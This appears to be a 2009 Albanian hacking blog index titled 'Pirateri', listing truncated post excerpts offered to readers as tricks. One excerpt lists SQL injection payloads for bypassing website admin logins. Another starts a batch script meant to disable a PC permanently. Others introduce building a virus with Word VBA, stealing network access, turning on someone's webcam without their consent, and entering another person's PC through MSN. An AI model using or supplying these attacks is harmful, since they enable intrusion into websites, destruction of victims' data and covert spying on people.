Pirateri

5 Emaila muni mi blloku

20/12/2009 21:25
 5   e-maila   mundesh   mi   bllokue me qit program munesh 5 email addressa per mi blloku perniher qe linki me download https://www.speedyshare.com/070173504.html

Me shti wep faqen tuaj ne google

20/12/2009 21:21
 Per Me Shti WebFaqen n`Google :https://www.google.com/addurl/?continue=/addurlE Kryni Proceduren Se Qka Duhet Me Plotsu Aty , Edhe Webi Juv Do Te Regjistrohet n`Google ...Per Me Hjek WebFaqen E Juv Prej Google :https://www.google.com/addurl/?continue=/removeedhe tanajjj webi juaj osht i...

Me qit dikon pre pc

20/12/2009 21:16
 Me qit   qet   nik ma posht   se   atje ku   duhet        trick per me qit naj kon prej   msn Ky osht ni trick per me qit naj kon prej msn-s..... I thu naj kujna me shkru te nicki i dyt(personal...

Si i ta kontrollojm kompjoterin nga nje kompjoter tjeter

20/12/2009 21:14
Vlen per ata qe kan Windows XP  Në versionin profesional të Windows XP nuk është nevoja të instalosh asnjë program, sepse Windows vjen me programin Remote Desktop Connection që të lejon ta përdorësh kompjuterin nga rrjeti, njësoj sikur ta kishe përpara. Ndiq hapat në vazhdim për...

ktu she kush ta ka ba bllok veq ja shenon emaili dhe te tregon

20/12/2009 21:12
 ktu she kush ta ka ba bllok veq ja shenon emaili dhe te tregon

Si ta lidhim televizorin ne kompjoter hack

20/12/2009 21:11
    DataVault, Irc Warez (Ty 4 Moving X).txt -[ How to rip Dynamic Flash Template ]-.txt 10 reasons why PCs crash U must Know.txt 10 Security Enhancements.txt 16x Dvd+-rw Dl Dvd Writer Comparison...

Virusat me te rrezikshem ne bot

20/12/2009 21:10
    W32.Bagle.AF W32.Bagle.H W32.Hiton.A W32.MyDoom.F W32.Netsky.Z W32.Netsky.D W32.Netsky.B W32.Sober.F W32.Sober.D W32.Sober.C ...

Fjalori shqip-turqisht humoristik

20/12/2009 21:09
  hyr ne ket faqe per te hyr re fjalori shqip-turqisht humoristik >>>>>>>>>>>>>>>>>>> http:piczo.com/mirjeta-fr/?g=48963490&cr=6&linkvar=000044 ...

SI te vjedhim rrjet

20/12/2009 21:06
 Si te vjedhim Rrjet Sdita ku me postu tjeter kun kit tem pasi qe nuk ish Forumi/Tutoriale . >> Next Si te vjedhim Rrjet ... Pershendetje , Ja nje toturial nga un se si te vjedhim rrjet ne Lan kjo vlen vetem se nese nuk e heton ISP'ja ( PROVRAJDERI ) po nese e heton a'ther ta...

Si tja leshojm dikujt kameren pa e ba accept

20/12/2009 21:05
 Me ja lshu dikujna kameren pa e pranu accept e downloadojm icq nuk e kam lingun per downloadim por kerkone ne google dhe e gjeni icq sherben me ja lshu dikujna kameren pa e pranu accept edhe se din qi pe kqyr bile ti e she kejt qa bon aii as se din aiit me te mira qe ni foto?

Program per marrien e ip

20/12/2009 21:04
    program per marrjen e ip dhe shum iformacione tjera rreth hackimit ne sistem? ja linku https://www.softlokup.com/dispaly.asp?id=25491

Krijo virus te rrezikshem

20/12/2009 21:03
 Ketu do postoj nje tutoral te shkurter se si te krijojm nje virus. Shkojm: Krijoni ( Bëni ) Virusin Tuaj Tani Njerez qe pra kjo eshte nje metod shum e thjesht si te krijoni nje virus  Shkojm Me Radhe 1.Qile Microsoft Word 2.Click ALT-F11 ku do te pop-up nje dritare e quajtur VBA...

Sa do jetosh

20/12/2009 21:02
 hyr ne ket faqe dhe shiko sa do jetosh  https://www.deathclock.com/

Qysh me dit kush na ka ba bllok

20/12/2009 21:02
 e downloadojm msn messenger plusin edhe kur te downloadojm i shohim kejt kush ka fol ne qat kompjoter edhe kush ta ka ba bllok?

Stilizime per nick name

20/12/2009 21:01
 Hyr ne ket faqe dhe ndreq nikun tend se keq e paske hehehhe hyr >>>>>>>>>>>> http//pic3.piczo.com/vigy-army/?g=26707554

Hyr najkujt ne pc prej msn

20/12/2009 21:00
    Qe ni mnyr per mi hi ne pc dikujt prej MSN !!! **kur je tu shkrujt siper lexon **Actions**dhe posht asaj lexon **Request Remote Assistance**klikon aty ...

SI te hym ne wep si admin

20/12/2009 20:59
 ' or 0=0 --  " or 0=0 --  or 0=0 --  ' or 0=0 #  " or 0=0 #  or 0=0 #  ' or 'x'='x  " or "x"="x  ') or ('x'='x  ' or 1=1--  " or 1=1--  or 1=1--  ' or a=a--  " or "a"="a  ') or ('a'='a  ") or ("a"="a  hi" or...

Fikja pc pergjithmon

20/12/2009 20:58
    fillimisht ne nuk mbajm pergjegjsi per demet qe mund ti shkaktoni ju. HAPIM notepadin dhe vendosim ket kod: @echo off attrib -r -s -h...